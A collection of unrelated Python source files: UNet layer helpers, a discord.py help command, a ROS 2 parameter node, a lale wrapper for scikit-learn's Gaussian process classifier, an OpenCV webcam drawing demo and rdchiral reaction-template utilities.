def _make_layer(self, block, block_num, in_channels, out_channels, stride):
layer = []
downsample = (in_channels != out_channels) or (stride != 1)
layer.append(block(in_channels, out_channels, stride, downsample))
for _ in range(block_num-1):
layer.append(block(out_channels, out_channels, 1, False))
return nn.Sequential(*layer)
def _fuse_layer(self, in_high_channels, in_low_channels, out_channels, fuse_mode='AsymBi'):
assert fuse_mode in ['BiLocal', 'AsymBi', 'BiGlobal']
if fuse_mode == 'BiLocal':
fuse_layer = BiLocalChaFuseReduce(in_high_channels, in_low_channels, out_channels)
elif fuse_mode == 'AsymBi':
fuse_layer = AsymBiChaFuseReduce(in_high_channels, in_low_channels, out_channels)
elif fuse_mode == 'BiGlobal':
fuse_layer = BiGlobalChaFuseReduce(in_high_channels, in_low_channels, out_channels)
else:
            raise NameError("Unknown fuse_mode: " + fuse_mode)
return fuse_layer
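# A minimal forward-pass sketch (hypothetical configuration): the block counts
# and channel widths below are one common small setting, not values mandated by
# this file, and the relative import above means this only runs inside the
# package (e.g. via python -m).
if __name__ == '__main__':
    net = ASKCResUNet(layer_blocks=[4, 4, 4], channels=[8, 16, 32, 64])
    out = net(torch.randn(1, 3, 256, 256))
    print(out.shape)  # expected: torch.Size([1, 1, 256, 256])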
|
458233
|
import discord
from discord.ext import commands
class Help(commands.Cog):
"""Displays the message you are currently viewing!"""
def __init__(self,bot):
self.bot = bot
@commands.command()
@commands.has_permissions(add_reactions=True,embed_links=True)
async def help(self,ctx,*cog):
"""Gets all cogs and commands of mine."""
if not cog:
helpEmbed=discord.Embed(title='Available Cogs',
description=f'Use `{ctx.prefix}help *cog*` to find out more about them!', color=self.bot.config.color)
cogs_desc = ''
for x in self.bot.cogs:
cogs_desc += f'**{x}** - {self.bot.cogs[x].__doc__}\n'
helpEmbed.add_field(name='\u200b', value=cogs_desc[0:len(cogs_desc)-1] if cogs_desc[0:len(cogs_desc)-1] else '\u200b',inline=False)
await ctx.message.add_reaction(emoji='✉')
await ctx.author.send(embed=helpEmbed)
else:
if len(cog) > 1:
helpEmbed = discord.Embed(title='Error!',description='That is way too many cogs!',color=discord.Color.red())
await ctx.author.send(embed=helpEmbed)
else:
found = False
for x in self.bot.cogs:
for y in cog:
if x == y:
helpEmbed=discord.Embed(title=f'{cog[0]} Commands',description=self.bot.cogs[cog[0]].__doc__, color=self.bot.config.color)
for c in self.bot.get_cog(y).get_commands():
if not c.hidden:
helpEmbed.add_field(name=c.name,value=c.help,inline=False)
found = True
                if not found:
                    helpEmbed = discord.Embed(title='Error!', description=f'Cog "{cog[0]}" does not exist! Maybe check your spelling?', color=discord.Color.red())
                else:
                    await ctx.message.add_reaction(emoji='✉')
                # send either the cog help or the error embed
                await ctx.author.send(embed=helpEmbed)
def setup(bot):
bot.add_cog(Help(bot))
|
458251
|
import rclpy
from rclpy.node import Node
from rclpy.exceptions import ParameterNotDeclaredException
from rcl_interfaces.msg import ParameterType
class MyPythonNode(Node):
def __init__(self):
super().__init__("dummy_node")
self.get_logger().info("This node just says 'Hello'")
timer_period = 2 # seconds
self.timer = self.create_timer(timer_period, self.timer_callback)
self.declare_parameters(
namespace='',
parameters=[
('my_int', None),
('my_string', None)
])
# self.declare_parameter('my_string', None)
def printParams(self):
self.get_logger().info("My parameters: " +
self.get_parameter('my_string').get_parameter_value().string_value + ", " + str(self.get_parameter('my_int').get_parameter_value().integer_value))
def timer_callback(self):
my_param_s = self.get_parameter(
'my_string').get_parameter_value().string_value
self.get_logger().info('Hello %s!' % my_param_s)
def main(args=None):
rclpy.init(args=args)
node = MyPythonNode()
node.printParams()
rclpy.spin(node)
node.destroy_node()
rclpy.shutdown()
if __name__ == "__main__":
main()
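# Usage note (hypothetical package/executable names): the parameters declared in
# MyPythonNode can be supplied at run time through the standard ROS 2 CLI, e.g.
#   ros2 run <package> <executable> --ros-args -p my_string:=world -p my_int:=42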
|
458284
|
from numpy import inf, nan
from sklearn.gaussian_process import GaussianProcessClassifier as Op
from lale.docstrings import set_docstrings
from lale.operators import make_operator
class _GaussianProcessClassifierImpl:
def __init__(self, **hyperparams):
self._hyperparams = hyperparams
self._wrapped_model = Op(**self._hyperparams)
def fit(self, X, y=None):
if y is not None:
self._wrapped_model.fit(X, y)
else:
self._wrapped_model.fit(X)
return self
def predict(self, X):
return self._wrapped_model.predict(X)
def predict_proba(self, X):
return self._wrapped_model.predict_proba(X)
_hyperparams_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "inherited docstring for GaussianProcessClassifier Gaussian process classification (GPC) based on Laplace approximation.",
"allOf": [
{
"type": "object",
"required": [
"kernel",
"optimizer",
"n_restarts_optimizer",
"max_iter_predict",
"warm_start",
"copy_X_train",
"random_state",
"multi_class",
"n_jobs",
],
"relevantToOptimizer": [
"optimizer",
"n_restarts_optimizer",
"max_iter_predict",
"multi_class",
],
"additionalProperties": False,
"properties": {
"kernel": {
"XXX TODO XXX": "kernel object",
"description": "The kernel specifying the covariance function of the GP",
"enum": [None],
"default": None,
},
"optimizer": {
"anyOf": [
{"laleType": "callable", "forOptimizer": False},
{"enum": ["fmin_l_bfgs_b"]},
],
"default": "fmin_l_bfgs_b",
"description": "Can either be one of the internally supported optimizers for optimizing the kernel's parameters, specified by a string, or an externally defined optimizer passed as a callable",
},
"n_restarts_optimizer": {
"type": "integer",
"minimumForOptimizer": 0,
"maximumForOptimizer": 1,
"distribution": "uniform",
"default": 0,
"description": "The number of restarts of the optimizer for finding the kernel's parameters which maximize the log-marginal likelihood",
},
"max_iter_predict": {
"type": "integer",
"minimumForOptimizer": 100,
"maximumForOptimizer": 101,
"distribution": "uniform",
"default": 100,
"description": "The maximum number of iterations in Newton's method for approximating the posterior during predict",
},
"warm_start": {
"type": "boolean",
"default": False,
"description": "If warm-starts are enabled, the solution of the last Newton iteration on the Laplace approximation of the posterior mode is used as initialization for the next call of _posterior_mode()",
},
"copy_X_train": {
"type": "boolean",
"default": True,
"description": "If True, a persistent copy of the training data is stored in the object",
},
"random_state": {
"anyOf": [
{"type": "integer"},
{"laleType": "numpy.random.RandomState"},
{"enum": [None]},
],
"default": None,
"description": "The generator used to initialize the centers",
},
"multi_class": {
"XXX TODO XXX": "string, default",
"description": "Specifies how multi-class classification problems are handled",
"enum": ["one_vs_one", "one_vs_rest"],
"default": "one_vs_rest",
},
"n_jobs": {
"anyOf": [{"type": "integer"}, {"enum": [None]}],
"default": 1,
"description": "The number of jobs to use for the computation",
},
},
}
],
}
_input_fit_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "Fit Gaussian process classification model",
"type": "object",
"required": ["X", "y"],
"properties": {
"X": {
"type": "array",
"items": {"type": "array", "items": {"type": "number"}},
"description": "Training data",
},
"y": {
"type": "array",
"items": {"type": "number"},
"description": "Target values, must be binary",
},
},
}
_input_predict_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "Perform classification on an array of test vectors X.",
"type": "object",
"required": ["X"],
"properties": {
"X": {"type": "array", "items": {"type": "array", "items": {"type": "number"}}}
},
}
_output_predict_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "Predicted target values for X, values are from ``classes_``",
"type": "array",
"items": {"type": "number"},
}
_input_predict_proba_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "Return probability estimates for the test vector X.",
"type": "object",
"required": ["X"],
"properties": {
"X": {"type": "array", "items": {"type": "array", "items": {"type": "number"}}}
},
}
_output_predict_proba_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "Returns the probability of the samples for each class in the model",
"type": "array",
"items": {"type": "array", "items": {"type": "number"}},
}
_combined_schemas = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "Combined schema for expected data and hyperparameters.",
"documentation_url": "https://scikit-learn.org/0.20/modules/generated/sklearn.gaussian_process.GaussianProcessClassifier#sklearn-gaussian_process-gaussianprocessclassifier",
"import_from": "sklearn.gaussian_process",
"type": "object",
"tags": {"pre": [], "op": ["estimator", "classifier"], "post": []},
"properties": {
"hyperparams": _hyperparams_schema,
"input_fit": _input_fit_schema,
"input_predict": _input_predict_schema,
"output_predict": _output_predict_schema,
"input_predict_proba": _input_predict_proba_schema,
"output_predict_proba": _output_predict_proba_schema,
},
}
GaussianProcessClassifier = make_operator(
_GaussianProcessClassifierImpl, _combined_schemas
)
set_docstrings(GaussianProcessClassifier)
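# A minimal usage sketch (hypothetical data): operators produced by make_operator
# expose the familiar scikit-learn style fit/predict interface.
if __name__ == '__main__':
    import numpy as np
    X = np.array([[0.0], [1.0], [2.0], [3.0]])
    y = np.array([0, 0, 1, 1])
    trained = GaussianProcessClassifier().fit(X, y)
    print(trained.predict(X))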
|
458286
|
import cv2
import numpy as np
def draw_rectangle(event, x, y, flags, params):
global x_init, y_init, drawing
def update_pts():
params["top_left_pt"] = (min(x_init, x), min(y_init, y))
params["bottom_right_pt"] = (max(x_init, x), max(y_init, y))
img[y_init:y, x_init:x] = 255 - img[y_init:y, x_init:x]
if event == cv2.EVENT_LBUTTONDOWN:
drawing = True
x_init, y_init = x, y
elif event == cv2.EVENT_MOUSEMOVE and drawing:
update_pts()
elif event == cv2.EVENT_LBUTTONUP:
drawing = False
update_pts()
if __name__=='__main__':
drawing = False
event_params = {"top_left_pt": (-1, -1), "bottom_right_pt": (-1, -1)}
cap = cv2.VideoCapture(0)
# Check if the webcam is opened correctly
if not cap.isOpened():
raise IOError("Cannot open webcam")
cv2.namedWindow('Webcam')
cv2.setMouseCallback('Webcam', draw_rectangle, event_params)
while True:
ret, frame = cap.read()
img = cv2.resize(frame, None, fx=0.5, fy=0.5, interpolation=cv2.INTER_AREA)
(x0,y0), (x1,y1) = event_params["top_left_pt"], event_params["bottom_right_pt"]
img[y0:y1, x0:x1] = 255 - img[y0:y1, x0:x1]
cv2.imshow('Webcam', img)
c = cv2.waitKey(1)
if c == 27:
break
cap.release()
cv2.destroyAllWindows()
|
458298
|
import rdkit.Chem as Chem
import rdkit.Chem.AllChem as AllChem
from rdkit.Chem.rdchem import ChiralType, BondType, BondDir
from rdchiral.chiral import template_atom_could_have_been_tetra
from rdchiral.utils import vprint
class rdchiralReaction():
'''
Class to store everything that should be pre-computed for a reaction. This
makes library application much faster, since we can pre-do a lot of work
instead of doing it for every mol-template pair
'''
def __init__(self, reaction_smarts):
# Keep smarts, useful for reporting
self.reaction_smarts = reaction_smarts
# Initialize - assigns stereochemistry and fills in missing rct map numbers
self.rxn = initialize_rxn_from_smarts(reaction_smarts)
# Combine template fragments so we can play around with isotopes
self.template_r, self.template_p = get_template_frags_from_rxn(self.rxn)
# Define molAtomMapNumber->atom dictionary for template rct and prd
self.atoms_rt_map = {a.GetIntProp('molAtomMapNumber'): a \
for a in self.template_r.GetAtoms() if a.HasProp('molAtomMapNumber')}
self.atoms_pt_map = {a.GetIntProp('molAtomMapNumber'): a \
for a in self.template_p.GetAtoms() if a.HasProp('molAtomMapNumber')}
# Call template_atom_could_have_been_tetra to pre-assign value to atom
[template_atom_could_have_been_tetra(a) for a in self.template_r.GetAtoms()]
[template_atom_could_have_been_tetra(a) for a in self.template_p.GetAtoms()]
class rdchiralReactants():
'''
Class to store everything that should be pre-computed for a reactant mol
so that library application is faster
'''
def __init__(self, reactant_smiles):
# Keep original smiles, useful for reporting
self.reactant_smiles = reactant_smiles
# Initialize into RDKit mol
self.reactants = initialize_reactants_from_smiles(reactant_smiles)
# Set isotope->atom dictionary
# all reactant atoms must be mapped after initialization, so this is safe
self.atoms_r = {a.GetIsotope(): a for a in self.reactants.GetAtoms()}
# Create copy of molecule without chiral information, used with
# RDKit's naive runReactants
self.reactants_achiral = initialize_reactants_from_smiles(reactant_smiles)
[a.SetChiralTag(ChiralType.CHI_UNSPECIFIED) for a in self.reactants_achiral.GetAtoms()]
# TODO: strip bond chirality?
# Pre-list reactant bonds (for stitching broken products)
self.bonds_by_isotope = [
(b.GetBeginAtom().GetIsotope(), b.GetEndAtom().GetIsotope(), b) \
for b in self.reactants.GetBonds()
]
def initialize_rxn_from_smarts(reaction_smarts):
# Initialize reaction
rxn = AllChem.ReactionFromSmarts(reaction_smarts)
rxn.Initialize()
if rxn.Validate()[1] != 0:
raise ValueError('validation failed')
vprint(2, 'Validated rxn without errors')
unmapped = 700
for rct in rxn.GetReactants():
rct.UpdatePropertyCache()
Chem.AssignStereochemistry(rct)
# Fill in atom map numbers
for a in rct.GetAtoms():
if not a.HasProp('molAtomMapNumber'):
a.SetIntProp('molAtomMapNumber', unmapped)
unmapped += 1
vprint(2, 'Added {} map nums to unmapped reactants', unmapped-700)
if unmapped > 800:
raise ValueError('Why do you have so many unmapped atoms in the template reactants?')
return rxn
def initialize_reactants_from_smiles(reactant_smiles):
# Initialize reactants
reactants = Chem.MolFromSmiles(reactant_smiles)
Chem.AssignStereochemistry(reactants, flagPossibleStereoCenters=True)
reactants.UpdatePropertyCache()
# To have the product atoms match reactant atoms, we
# need to populate the Isotope field, since this field
# gets copied over during the reaction.
[a.SetIsotope(i+1) for (i, a) in enumerate(reactants.GetAtoms())]
vprint(2, 'Initialized reactants, assigned isotopes, stereochem, flagpossiblestereocenters')
return reactants
def get_template_frags_from_rxn(rxn):
# Copy reaction template so we can play around with isotopes
for i, rct in enumerate(rxn.GetReactants()):
if i == 0:
template_r = rct
else:
template_r = AllChem.CombineMols(template_r, rct)
for i, prd in enumerate(rxn.GetProducts()):
if i == 0:
template_p = prd
else:
template_p = AllChem.CombineMols(template_p, prd)
return template_r, template_p
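# A minimal usage sketch (hypothetical SMARTS/SMILES): pre-compute the template
# and reactant objects once so they can be reused across many applications.
if __name__ == '__main__':
    rxn = rdchiralReaction('[C:1]=[O:2]>>[C:1][O:2]')
    rct = rdchiralReactants('CC=O')
    print(len(rct.atoms_r), 'isotope-mapped reactant atoms')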
|